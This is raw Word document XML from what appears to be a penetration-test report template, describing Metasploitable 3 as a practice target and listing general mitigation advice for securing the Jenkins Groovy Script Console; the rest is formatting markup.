          <w:p w14:paraId="0E4C1752" w14:textId="77777777" w:rsidR="001C1A68" w:rsidRPr="001C1A68" w:rsidRDefault="001C1A68" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C1A68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>Metasploitable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C1A68">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18276874" w14:textId="77777777" w:rsidR="001C1A68" w:rsidRDefault="001C1A68" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31CBDBBF" w14:textId="3ADEDE71" w:rsidR="00AA059E" w:rsidRPr="00C757E4" w:rsidRDefault="001C1A68" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Metasploitable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 3 is a deliberately vulnerable virtual machine designed for security testing and educational purposes. Refer to its documentation for more details on using this target system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74B9F51E" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42D3968E" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="00234F18"/>
    <w:p w14:paraId="4A439F0D" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E">
      <w:pPr>
        <w:sectPr w:rsidR="00AA059E" w:rsidSect="006905C4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6"/>
        <w:gridCol w:w="2167"/>
        <w:gridCol w:w="727"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA059E" w14:paraId="1065EFB8" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="1889"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DC15BB6" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D79">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                <w:caps/>
                <w:color w:val="4354A2" w:themeColor="accent1"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097D79">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                <w:caps/>
                <w:color w:val="4354A2" w:themeColor="accent1"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Mitigation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DE85F48" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D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Jenkins Configuration:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="569C4B42" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D7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sz w:val="24"/>
              </w:rPr>
              <w:t>Review and secure Jenkins configurations, ensuring that only authorized users have access to the Groovy Script Console.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="450017CA" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D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Patch Management:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F9D810B" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D7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sz w:val="24"/>
              </w:rPr>
              <w:t>Keep Jenkins and related software up to date with the latest security patches to address known vulnerabilities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="486C429C" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D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Access Controls:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C443CAD" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D7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sz w:val="24"/>
              </w:rPr>
              <w:t>Implement strict access controls to limit user privileges and prevent unauthorized script execution.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60D8A92A" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D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Security Awareness:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72DE94E2" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D7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sz w:val="24"/>
              </w:rPr>
              <w:t>Educate users about the risks associated with executing scripts and the importance of adhering to security best practices.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6002A021" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D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Network Segmentation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FC5FFE8" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D7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sz w:val="24"/>
              </w:rPr>
              <w:t>Employ network segmentation to isolate critical systems and minimize the impact of potential breaches.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F75307" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D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Regular Audits:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30391507" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D7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sz w:val="24"/>
              </w:rPr>
              <w:t>Conduct regular security audits to identify and address vulnerabilities in the infrastructure.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18E86D16" w14:textId="77777777" w:rsidR="00097D79" w:rsidRPr="00097D79" w:rsidRDefault="00097D79" w:rsidP="00097D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97D79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>By implementing these mitigation measures, organizations can enhance the security posture of their systems and reduce the risk of similar vulnerabilities being exploited.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F398AEB" w14:textId="6C03FAED" w:rsidR="00AA059E" w:rsidRPr="000D719D" w:rsidRDefault="00AA059E" w:rsidP="000D719D">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2894" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7D932100" w14:textId="3CD900E4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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA059E" w14:paraId="4D8028AB" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="2388"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10793" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="5DCB5A5A" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D56296D" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA059E" w14:paraId="61E630D6" w14:textId="77777777" w:rsidTr="00946B83">
        <w:trPr>
          <w:trHeight w:val="1988"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10793" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="3EB068B2" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRPr="00693724" w:rsidRDefault="00AA059E" w:rsidP="004218DE">
            <w:pPr>
              <w:pStyle w:val="TableHeader"/>
              <w:rPr>
                <w:noProof/>
                <w:color w:val="212A51" w:themeColor="accent1" w:themeShade="80"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10AD42BE" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA059E" w14:paraId="10633816" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="2789"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10793" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="56EC7C53" w14:textId="08F6779A" w:rsidR="00AA059E" w:rsidRPr="00693724" w:rsidRDefault="00AA059E" w:rsidP="004218DE">
            <w:pPr>
              <w:pStyle w:val="TableHeader"/>
              <w:rPr>
                <w:color w:val="212A51" w:themeColor="accent1" w:themeShade="80"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="496A5C49" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="496B561E" w14:textId="77777777" w:rsidR="00C2411D" w:rsidRPr="008C053E" w:rsidRDefault="00C2411D" w:rsidP="00CD6F89"/>
    <w:sectPr w:rsidR="00C2411D" w:rsidRPr="008C053E" w:rsidSect="006905C4">
      <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
      <w:pgMar w:top="641" w:right="720" w:bottom="284" w:left="720" w:header="709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24A2" w14:textId="77777777" w:rsidR="006905C4" w:rsidRDefault="006905C4" w:rsidP="001D6100">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="550E9730" w14:textId="77777777" w:rsidR="006905C4" w:rsidRDefault="006905C4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02125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Look w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
        </w:tblPr>
        <w:tblGrid>
          <w:gridCol w:w="848"/>
          <w:gridCol w:w="2842"/>
          <w:gridCol w:w="7110"/>
        </w:tblGrid>
        <w:tr w:rsidR="005D14FC" w14:paraId="0CC0D0D8" w14:textId="77777777" w:rsidTr="00F92871">
          <w:trPr>
            <w:trHeight w:val="454"/>
          </w:trPr>
          <w:tc>
            <w:tcPr>
              <w:tcW w:w="848" w:type="dxa"/>
              <w:vAlign w:val="center"/>
            </w:tcPr>
            <w:p w14:paraId="7F921216" w14:textId="77777777" w:rsidR="005D14FC" w:rsidRDefault="006B6825" w:rsidP="005D14FC">
              <w:r>
                <w:rPr>
                  <w:noProof/>
                  <w:lang w:val="en-AU" w:eastAsia="en-AU"/>
                </w:rPr>
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44C13E40" wp14:editId="447DE781">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>-54610</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>-4445</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="6732000" cy="151200"/>
                    <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                    <wp:wrapNone/>
                    <wp:docPr id="1" name="Picture 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32000" cy="151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2842" w:type="dxa"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
              <w:vAlign w:val="center"/>
            </w:tcPr>
            <w:p w14:paraId="21CCCAA8" w14:textId="77777777" w:rsidR="005D14FC" w:rsidRPr="006B498E" w:rsidRDefault="00896FC8" w:rsidP="00F92871">
              <w:pPr>
                <w:pStyle w:val="Heading3"/>
              </w:pPr>
              <w:r w:rsidRPr="00896FC8">
                <w:t xml:space="preserve">REPORT TITLE | </w:t>
              </w:r>
              <w:r w:rsidR="005D14FC">
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r w:rsidR="005D14FC">
                <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
              </w:r>
              <w:r w:rsidR="005D14FC">
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="00946B83">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>4</w:t>
              </w:r>
              <w:r w:rsidR="005D14FC">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:tc>
          <w:tc>
            <w:tcPr>
              <w:tcW w:w="7110" w:type="dxa"/>
              <w:vAlign w:val="center"/>
            </w:tcPr>
            <w:p w14:paraId="488761D4" w14:textId="77777777" w:rsidR="005D14FC" w:rsidRDefault="005D14FC" w:rsidP="005D14FC"/>
          </w:tc>
        </w:tr>
      </w:tbl>
      <w:p w14:paraId="5C18A53D" w14:textId="77777777" w:rsidR="005D14FC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9272" w14:textId="77777777" w:rsidR="006905C4" w:rsidRDefault="006905C4" w:rsidP="001D6100">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1423BCCA" w14:textId="77777777" w:rsidR="006905C4" w:rsidRDefault="006905C4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D14582"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="33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5070"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4344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5384">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2113087965">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="329607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3A"/>
    <w:rsid w:val="00003337"/>
    <w:rsid w:val="000144C2"/>
    <w:rsid w:val="000328A4"/>
    <w:rsid w:val="00037CA5"/>
    <w:rsid w:val="00053882"/>
    <w:rsid w:val="00056380"/>
    <w:rsid w:val="00060922"/>
    <w:rsid w:val="00060FE8"/>
    <w:rsid w:val="000763D6"/>
    <w:rsid w:val="00080369"/>
    <w:rsid w:val="00082250"/>
    <w:rsid w:val="0008539C"/>
    <w:rsid w:val="00085B31"/>
    <w:rsid w:val="00087677"/>
    <w:rsid w:val="000943EA"/>
    <w:rsid w:val="000975AD"/>
    <w:rsid w:val="00097B64"/>
    <w:rsid w:val="00097D79"/>
    <w:rsid w:val="000A06A1"/>
    <w:rsid w:val="000A0DED"/>
    <w:rsid w:val="000A4637"/>
    <w:rsid w:val="000A78A6"/>
    <w:rsid w:val="000B7BB9"/>
    <w:rsid w:val="000C0C56"/>
    <w:rsid w:val="000C65C2"/>
    <w:rsid w:val="000D2E0B"/>
    <w:rsid w:val="000D719D"/>
    <w:rsid w:val="000F3981"/>
    <w:rsid w:val="00110747"/>
    <w:rsid w:val="001238A9"/>
    <w:rsid w:val="001367A1"/>
    <w:rsid w:val="001370C5"/>
    <w:rsid w:val="00141E0B"/>
    <w:rsid w:val="00145CDF"/>
    <w:rsid w:val="00147278"/>
    <w:rsid w:val="00160BA0"/>
    <w:rsid w:val="001624A1"/>
    <w:rsid w:val="00173DDF"/>
    <w:rsid w:val="00173F5E"/>
    <w:rsid w:val="00196839"/>
    <w:rsid w:val="001A1B0F"/>
    <w:rsid w:val="001A5337"/>
    <w:rsid w:val="001B557E"/>
    <w:rsid w:val="001C1A68"/>
    <w:rsid w:val="001C3750"/>
    <w:rsid w:val="001D333E"/>
    <w:rsid w:val="001D6100"/>
    <w:rsid w:val="001F0719"/>
    <w:rsid w:val="001F4D45"/>
    <w:rsid w:val="001F70E8"/>
    <w:rsid w:val="001F7410"/>
    <w:rsid w:val="001F7E5A"/>
    <w:rsid w:val="00215D82"/>
    <w:rsid w:val="00216DC3"/>
    <w:rsid w:val="002241FA"/>
    <w:rsid w:val="00227F46"/>
    <w:rsid w:val="00234F18"/>
    <w:rsid w:val="00235CED"/>
    <w:rsid w:val="002421BC"/>
    <w:rsid w:val="002466F5"/>
    <w:rsid w:val="0024674C"/>
    <w:rsid w:val="0024712D"/>
    <w:rsid w:val="002478BA"/>
    <w:rsid w:val="00254883"/>
    <w:rsid w:val="00257F15"/>
    <w:rsid w:val="00260CDA"/>
    <w:rsid w:val="00264020"/>
    <w:rsid w:val="00266EB1"/>
    <w:rsid w:val="0026762F"/>
    <w:rsid w:val="00285D45"/>
    <w:rsid w:val="002872D4"/>
    <w:rsid w:val="0029255E"/>
    <w:rsid w:val="00292763"/>
    <w:rsid w:val="002932D4"/>
    <w:rsid w:val="002D51DF"/>
    <w:rsid w:val="002F2DFD"/>
    <w:rsid w:val="002F3974"/>
    <w:rsid w:val="002F66CC"/>
    <w:rsid w:val="003010D2"/>
    <w:rsid w:val="003076A5"/>
    <w:rsid w:val="003125D7"/>
    <w:rsid w:val="00343A06"/>
    <w:rsid w:val="00347221"/>
    <w:rsid w:val="0037144C"/>
    <w:rsid w:val="0037442A"/>
    <w:rsid w:val="003746D2"/>
    <w:rsid w:val="003924B1"/>
    <w:rsid w:val="003A0B66"/>
    <w:rsid w:val="003A3738"/>
    <w:rsid w:val="003B6242"/>
    <w:rsid w:val="003D7A2D"/>
    <w:rsid w:val="003E115A"/>
    <w:rsid w:val="003F7B71"/>
    <w:rsid w:val="00400EE5"/>
    <w:rsid w:val="004121B6"/>
    <w:rsid w:val="00413E93"/>
    <w:rsid w:val="00414D6A"/>
    <w:rsid w:val="00416701"/>
    <w:rsid w:val="00422B3E"/>
    <w:rsid w:val="00424887"/>
    <w:rsid w:val="0044226E"/>
    <w:rsid w:val="00442413"/>
    <w:rsid w:val="004460B5"/>
    <w:rsid w:val="00446543"/>
    <w:rsid w:val="004565BD"/>
    <w:rsid w:val="00484589"/>
    <w:rsid w:val="00492BA2"/>
    <w:rsid w:val="00497892"/>
    <w:rsid w:val="004A11D9"/>
    <w:rsid w:val="004A14D7"/>
    <w:rsid w:val="004A330F"/>
    <w:rsid w:val="004B1CE7"/>
    <w:rsid w:val="004B1F38"/>
    <w:rsid w:val="004B76EF"/>
    <w:rsid w:val="004C0ECD"/>
    <w:rsid w:val="004D0244"/>
    <w:rsid w:val="004D2785"/>
    <w:rsid w:val="004E2B50"/>
    <w:rsid w:val="004E4E8E"/>
    <w:rsid w:val="004E6DD6"/>
    <w:rsid w:val="004E6EBF"/>
    <w:rsid w:val="004F0666"/>
    <w:rsid w:val="004F49D8"/>
    <w:rsid w:val="004F6412"/>
    <w:rsid w:val="004F6C87"/>
    <w:rsid w:val="00505B99"/>
    <w:rsid w:val="00506CE1"/>
    <w:rsid w:val="005122D9"/>
    <w:rsid w:val="00513C62"/>
    <w:rsid w:val="00525303"/>
    <w:rsid w:val="00526680"/>
    <w:rsid w:val="00541560"/>
    <w:rsid w:val="00544402"/>
    <w:rsid w:val="00567C8C"/>
    <w:rsid w:val="00576571"/>
    <w:rsid w:val="00594B05"/>
    <w:rsid w:val="00594F0E"/>
    <w:rsid w:val="00597681"/>
    <w:rsid w:val="005A182D"/>
    <w:rsid w:val="005A57C7"/>
    <w:rsid w:val="005A7A4F"/>
    <w:rsid w:val="005C35F4"/>
    <w:rsid w:val="005C38FE"/>
    <w:rsid w:val="005C684A"/>
    <w:rsid w:val="005D14FC"/>
    <w:rsid w:val="005D42B1"/>
    <w:rsid w:val="005E152A"/>
    <w:rsid w:val="005E752E"/>
    <w:rsid w:val="005F3AB0"/>
    <w:rsid w:val="00605B50"/>
    <w:rsid w:val="0060774D"/>
    <w:rsid w:val="00615348"/>
    <w:rsid w:val="00616C96"/>
    <w:rsid w:val="00622B1B"/>
    <w:rsid w:val="00633A86"/>
    <w:rsid w:val="00640AC5"/>
    <w:rsid w:val="00645773"/>
    <w:rsid w:val="00650B11"/>
    <w:rsid w:val="00663830"/>
    <w:rsid w:val="00665417"/>
    <w:rsid w:val="00666BF4"/>
    <w:rsid w:val="00681D9A"/>
    <w:rsid w:val="006905C4"/>
    <w:rsid w:val="00692B40"/>
    <w:rsid w:val="00692BEE"/>
    <w:rsid w:val="00693724"/>
    <w:rsid w:val="006A5C03"/>
    <w:rsid w:val="006A5D7F"/>
    <w:rsid w:val="006A6D66"/>
    <w:rsid w:val="006B3CF5"/>
    <w:rsid w:val="006B498E"/>
    <w:rsid w:val="006B6825"/>
    <w:rsid w:val="006C30F5"/>
    <w:rsid w:val="006C3507"/>
    <w:rsid w:val="006C60E6"/>
    <w:rsid w:val="006D088C"/>
    <w:rsid w:val="006E18E3"/>
    <w:rsid w:val="006F4BD3"/>
    <w:rsid w:val="007127AA"/>
    <w:rsid w:val="00721089"/>
    <w:rsid w:val="007246A9"/>
    <w:rsid w:val="007343BB"/>
    <w:rsid w:val="00745214"/>
    <w:rsid w:val="00752BF7"/>
    <w:rsid w:val="007700C3"/>
    <w:rsid w:val="0078163A"/>
    <w:rsid w:val="00783E38"/>
    <w:rsid w:val="00794584"/>
    <w:rsid w:val="007A7D5B"/>
    <w:rsid w:val="007B7474"/>
    <w:rsid w:val="007C0DC4"/>
    <w:rsid w:val="007C28B0"/>
    <w:rsid w:val="007D2AC9"/>
    <w:rsid w:val="007E0595"/>
    <w:rsid w:val="007E0916"/>
    <w:rsid w:val="007E358F"/>
    <w:rsid w:val="007E75BF"/>
    <w:rsid w:val="007F3A5F"/>
    <w:rsid w:val="007F60FD"/>
    <w:rsid w:val="008046C5"/>
    <w:rsid w:val="008065EB"/>
    <w:rsid w:val="00807FC4"/>
    <w:rsid w:val="008204B6"/>
    <w:rsid w:val="00827A68"/>
    <w:rsid w:val="00831F6E"/>
    <w:rsid w:val="0085174C"/>
    <w:rsid w:val="008531B3"/>
    <w:rsid w:val="00857021"/>
    <w:rsid w:val="008576F7"/>
    <w:rsid w:val="008609C8"/>
    <w:rsid w:val="00896FC8"/>
    <w:rsid w:val="008A6E72"/>
    <w:rsid w:val="008B2D7D"/>
    <w:rsid w:val="008C053E"/>
    <w:rsid w:val="008D5E3D"/>
    <w:rsid w:val="008E1844"/>
    <w:rsid w:val="008E3443"/>
    <w:rsid w:val="008E573F"/>
    <w:rsid w:val="008E57CD"/>
    <w:rsid w:val="008F482E"/>
    <w:rsid w:val="0092692E"/>
    <w:rsid w:val="0093590C"/>
    <w:rsid w:val="009415F4"/>
    <w:rsid w:val="00945B87"/>
    <w:rsid w:val="00946B83"/>
    <w:rsid w:val="00972434"/>
    <w:rsid w:val="0097477F"/>
    <w:rsid w:val="00976BD2"/>
    <w:rsid w:val="0099064B"/>
    <w:rsid w:val="009929B8"/>
    <w:rsid w:val="00994E13"/>
    <w:rsid w:val="009A38E6"/>
    <w:rsid w:val="009B62FE"/>
    <w:rsid w:val="009C108E"/>
    <w:rsid w:val="009C1126"/>
    <w:rsid w:val="009D1A70"/>
    <w:rsid w:val="009E41C2"/>
    <w:rsid w:val="009F0A19"/>
    <w:rsid w:val="009F26CE"/>
    <w:rsid w:val="00A04ED7"/>
    <w:rsid w:val="00A05D5E"/>
    <w:rsid w:val="00A0654C"/>
    <w:rsid w:val="00A0697D"/>
    <w:rsid w:val="00A12506"/>
    <w:rsid w:val="00A22B69"/>
    <w:rsid w:val="00A31C45"/>
    <w:rsid w:val="00A320B2"/>
    <w:rsid w:val="00A40063"/>
    <w:rsid w:val="00A40213"/>
    <w:rsid w:val="00A56059"/>
    <w:rsid w:val="00A665BC"/>
    <w:rsid w:val="00A83BA2"/>
    <w:rsid w:val="00A870C2"/>
    <w:rsid w:val="00A9283F"/>
    <w:rsid w:val="00A951C7"/>
    <w:rsid w:val="00AA059E"/>
    <w:rsid w:val="00AA2B84"/>
    <w:rsid w:val="00AA69D0"/>
    <w:rsid w:val="00AC3228"/>
    <w:rsid w:val="00AD1D41"/>
    <w:rsid w:val="00AD760D"/>
    <w:rsid w:val="00B1646D"/>
    <w:rsid w:val="00B203E4"/>
    <w:rsid w:val="00B21980"/>
    <w:rsid w:val="00B31D71"/>
    <w:rsid w:val="00B479D3"/>
    <w:rsid w:val="00B61C00"/>
    <w:rsid w:val="00B74F01"/>
    <w:rsid w:val="00B87435"/>
    <w:rsid w:val="00B878D9"/>
    <w:rsid w:val="00B92E88"/>
    <w:rsid w:val="00B93BF0"/>
    <w:rsid w:val="00B943F9"/>
    <w:rsid w:val="00BA5FF0"/>
    <w:rsid w:val="00BA6C80"/>
    <w:rsid w:val="00BB1A78"/>
    <w:rsid w:val="00BC268E"/>
    <w:rsid w:val="00BD0AF4"/>
    <w:rsid w:val="00BD5E90"/>
    <w:rsid w:val="00BE0DD3"/>
    <w:rsid w:val="00BE33C9"/>
    <w:rsid w:val="00BE5602"/>
    <w:rsid w:val="00BE764F"/>
    <w:rsid w:val="00BF0358"/>
    <w:rsid w:val="00BF1870"/>
    <w:rsid w:val="00BF6D43"/>
    <w:rsid w:val="00C02739"/>
    <w:rsid w:val="00C03328"/>
    <w:rsid w:val="00C051E7"/>
    <w:rsid w:val="00C07DC5"/>
    <w:rsid w:val="00C2411D"/>
    <w:rsid w:val="00C27CAD"/>
    <w:rsid w:val="00C34BBF"/>
    <w:rsid w:val="00C411FE"/>
    <w:rsid w:val="00C4659A"/>
    <w:rsid w:val="00C5195D"/>
    <w:rsid w:val="00C6279E"/>
    <w:rsid w:val="00C757E4"/>
    <w:rsid w:val="00C76822"/>
    <w:rsid w:val="00C85F71"/>
    <w:rsid w:val="00C94B8D"/>
    <w:rsid w:val="00C962C9"/>
    <w:rsid w:val="00CA518E"/>
    <w:rsid w:val="00CB2D02"/>
    <w:rsid w:val="00CB4740"/>
    <w:rsid w:val="00CB7459"/>
    <w:rsid w:val="00CC28A3"/>
    <w:rsid w:val="00CC76A2"/>
    <w:rsid w:val="00CD05DA"/>
    <w:rsid w:val="00CD4C3A"/>
    <w:rsid w:val="00CD4C9D"/>
    <w:rsid w:val="00CD6F89"/>
    <w:rsid w:val="00CE0694"/>
    <w:rsid w:val="00CE79FB"/>
    <w:rsid w:val="00D109CA"/>
    <w:rsid w:val="00D12407"/>
    <w:rsid w:val="00D24DBC"/>
    <w:rsid w:val="00D2733B"/>
    <w:rsid w:val="00D31E6C"/>
    <w:rsid w:val="00D32761"/>
    <w:rsid w:val="00D40645"/>
    <w:rsid w:val="00D55632"/>
    <w:rsid w:val="00D60FC6"/>
    <w:rsid w:val="00D62E75"/>
    <w:rsid w:val="00D66286"/>
    <w:rsid w:val="00D72150"/>
    <w:rsid w:val="00D75E21"/>
    <w:rsid w:val="00D8090B"/>
    <w:rsid w:val="00D831CA"/>
    <w:rsid w:val="00D92683"/>
    <w:rsid w:val="00D96065"/>
    <w:rsid w:val="00DB709E"/>
    <w:rsid w:val="00DC413B"/>
    <w:rsid w:val="00DC59CF"/>
    <w:rsid w:val="00DE02EC"/>
    <w:rsid w:val="00DE4C49"/>
    <w:rsid w:val="00DE638A"/>
    <w:rsid w:val="00DF2D08"/>
    <w:rsid w:val="00DF4B6A"/>
    <w:rsid w:val="00E07642"/>
    <w:rsid w:val="00E10428"/>
    <w:rsid w:val="00E236F1"/>
    <w:rsid w:val="00E3165F"/>
    <w:rsid w:val="00E31787"/>
    <w:rsid w:val="00E31A2A"/>
    <w:rsid w:val="00E31D48"/>
    <w:rsid w:val="00E33981"/>
    <w:rsid w:val="00E42D9C"/>
    <w:rsid w:val="00E57E86"/>
    <w:rsid w:val="00E719B2"/>
    <w:rsid w:val="00E75770"/>
    <w:rsid w:val="00E82A80"/>
    <w:rsid w:val="00E872FA"/>
    <w:rsid w:val="00E92734"/>
    <w:rsid w:val="00EB5752"/>
    <w:rsid w:val="00EB6985"/>
    <w:rsid w:val="00EF3CB4"/>
    <w:rsid w:val="00F01884"/>
    <w:rsid w:val="00F1130A"/>
    <w:rsid w:val="00F27CF2"/>
    <w:rsid w:val="00F3032E"/>
    <w:rsid w:val="00F335D4"/>
    <w:rsid w:val="00F34E58"/>
    <w:rsid w:val="00F444C7"/>
    <w:rsid w:val="00F678B6"/>
